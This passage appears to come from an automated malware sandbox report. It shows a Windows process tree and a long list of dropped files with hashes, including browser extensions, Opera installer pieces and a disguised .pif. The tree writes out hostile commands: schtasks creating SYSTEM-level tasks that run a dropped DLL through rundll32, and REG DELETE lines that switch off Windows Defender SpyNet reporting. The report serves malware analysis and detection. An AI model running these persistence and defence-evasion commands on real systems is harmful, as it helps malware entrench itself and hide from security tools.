                                                                                                                                                                                      schtasks /CREATE /TN "ANJbqLXwqnrLUPLSN2" /F /xml "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\nkruOEG.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:1660
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "KXedXbbPXfRSTqSGhkK2" /F /xml "C:\Program Files (x86)\LHSdqcBuKngoC\yvUmlog.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4360
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "UBMMPCNwOPxrkxvwY" /SC once /ST 02:14:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gCqgzsIdJleQZgeU\fdaLIgwT\jWHuvrA.dll\",#1 /iIsite_idYiE 385118" /V1 /F
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:1336
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "UBMMPCNwOPxrkxvwY"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3828
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4812
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4596
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1328
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2272
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4324
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /DELETE /F /TN "OyNPSoRSgtYwHEpij"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4844
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3664
                                                                                                                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gCqgzsIdJleQZgeU\fdaLIgwT\jWHuvrA.dll",#1 /iIsite_idYiE 385118
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4092
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gCqgzsIdJleQZgeU\fdaLIgwT\jWHuvrA.dll",#1 /iIsite_idYiE 385118
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        PID:712
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "UBMMPCNwOPxrkxvwY"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2996
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:796

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          fc879f3f627a636974b812c49f239594

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8dafc5c15e8909285b213a80efe8eb0f1875fd0e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8d64db8b470447bdd2c19e45dbee490a282eaf813865c099f381671f27012794

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e33f4bb7f6ba21c0b8e7dc177ba3ca0f3f849400c8ca75b5a7437fc523a714d762bebc2bbd3d8b54fc7f85458621cc05d28c8759941e666d51560fbcee2bbc64

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          187B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          136B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          150B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          10KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          31df1bad2644f2a98012d8fd3ac77ea4

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5f7fe15dfa42fec5aae39acf9ed31d17fe7a9793

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          17726f11457cbc3205906f3dfb28dfacb73867d91bc200934b0a73ebe176333f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          ebe207dac523c25b3e71e37e159edafe50af29a5af0c6e92af795657b3fad20b19b13dded9e76eab8e2c08faa1682aa1d8a5549a96c4fb4682958f37ab150ab8

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          151B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d6fd3bcede15dd0c377415c1ddba18e8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a356260141230d70e0413a07c81faecb05bea058

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          4a620774066d484ceafcb96d7abd030f2f96c5a4299e458a8d0d17004d64c3f9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b36add5d5ae3332dfca60982b22e89d6c5c422fa279173a610cca10d960ab968e5d8b24cd86097045f540a758b68f736640247df411910c60feda896e030c09f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          18KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          00081559f291e4b35214385fb5acbbff

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          4dc69e25405a9a405c5a18c010fb5dd2b2bc14d6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b6a4bbec832329bb86a41e0342f891f7315adfcc65588cd01421ff490350d579

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4deb36d61178ae3f8ee9065f2daa3acddf3f138790160bc17bd94ef39df603bfa4dd4f4ab3d409a00a2007daa7a5d3afa8b258d004c88fe9434ccdbf048183c4

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\EUA8FUrCrHj7WGR8Q6fH3SlR.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.8MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          df8f64561e3a774f957a1cb5971b7570

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          88a5391c6497015fb18edd12471d44c66b0d2d13

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          68e99e5954984fa31d1188469820b71f5d4cefa0de49c10982e428bf98ca7fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1aba16b35d2cc7a89da45b2288cca4ac08497331f0d15c50584aa2ef69af34ad52094571f029bdcfda372e00461a9d549f97a56f08fb96cf85499574e9ea29d0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          b0f128c3579e6921cfff620179fb9864

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          60e19c987a96182206994ffd509d2849fdb427e3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          34afbc4605531efdbe6f6ce57f567c0a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbgcore.DLL

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5a6cd2117967ec78e7195b6ee10fc4da

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          72d929eeb50dd58861a1d4cf13902c0b89fadc34

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          861a07bcf2a5cb0dda1aaf6dfcb57b26

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a0bdbbc398583a7cfdd88624c9ac2da1764e0826

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202312100330521\opera_package

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          103.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1288fb19fba9f71635060944db19b5b8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9302472879eb242878f9e150fa9b3c7660134a3c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f57b0eb8bb74a621933af4c3204ac8d1af39e774acd846e8ac31c79dba206b75

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          21233b4a82c094fa65e90c03e322f6d9ed80a0e90d0cdfea0cd7f58ccf8c6a95ecae9440d080a5fed7081fbb54d07ef47e4465f8304df4bee64fb98b79780e9b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\922\Gilbert.pif

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          924KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          848164d084384c49937f99d5b894253e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3055ef803eeec4f175ebf120f94125717ee12444

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          aabe1cf076f48f32542f49a92e4ca9f054b31d5a9949119991b897b9489fe775d8009896408ba49ac43ec431c87c0d385daead9dbbde7ef6309b0c97bbaf852a

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\922\Gilbert.pif

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          924KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          848164d084384c49937f99d5b894253e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3055ef803eeec4f175ebf120f94125717ee12444

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          aabe1cf076f48f32542f49a92e4ca9f054b31d5a9949119991b897b9489fe775d8009896408ba49ac43ec431c87c0d385daead9dbbde7ef6309b0c97bbaf852a

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\922\m

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          521KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0408a9afc1318955ce329a15d36a4757

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          50e3c5e6a6c21b8be97a417788e6f223e982abd9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9ad503608ed7d8776b3a1a4d8391c0a37b7e8ed22ecfb140b77eade1996e8f6d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0866747febb22913946dcaac28af5709c72eedf693ea71bede6fa4e12d2af30a5f90908f09cb33ee8300260aa8f179e9668ecd0762f3547373286390c517c4b6

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\Creates

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          164KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7a5d311b641bef4cfe9d21faf7fb879b

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          4990cdbf847fe24da31c64e1d16aff3c067d3c26

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          6c578f45fed323c2314a28c0e942aa01c32e5ae54eb2db8e8c59f3c4244a37b2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e5f5a250483d8cb2539c40bd035c8eee7cfa25c54e72794f5159c68c7a5dd8ab69be4aba43440304e2f6c400a6ed0f21d7476cdbbaa675a88f33f40f496bd0c0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\Eat

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          151KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          97f0d53d25c3cd859d5698616ef158f3

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          40bf66dea4d79a5319e3faa34e492b24cba71f85

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9012e41eb1607a04e7a6258fd89c87c0149fdfea65d72a986ff4a476d0420500

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          59345c422c531d0ecedfd971e5be0752da7a439a39769a992fe34f0f24a5100fd03bdc5221b6bac4866130ec5ac20f7320630e0afd7292321a84178685e677f4

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\Encounter

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          140KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          01f9bd7221815e810461dc7c29483d5c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a1b05be02edf3509c1e35151d8eecf34f2deb534

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          c1fc06443b474a315df4be3d087a7f8bb8b26f2a9a64847bae26104fe75b116f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f04fe70894be0b526277f5cf60402fc4d07d65359670d0dc92d045ea27a9fc8444f33e45b4d0d0758db7975381e03bc0220a651d43048ed927c65b1ff61fb3ad

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\Greece

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          299KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c0eda1a9a5ddacd222fb6a8bb92830a7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fb3a07b2a3b7276cb03859789427f8b95a7632e3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          50901d95e33acc4458cd0b77b7282c832146c49b281767167c107c4ca49ac1f0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          56b3dd378eaabda0675cdf9c4f208f223dd3c6d813be065d99650d6cca50b1678e0196f2cd8c3f10d0724d2310b6eaa7ef7421a425f634f2d54877073ba8922b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\29844\Scored

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          33KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          70b204b6b992a525cf344e73b9c54ec1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a08f6d3419c02e4fcd91048154850ee4190efd64

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          2a3749c025f967ab6649f91842fbea26d7b1c2ff1c4ad8b4d6d20b9e7b48ed2c

                                                                                                                                                                                                          SHA512

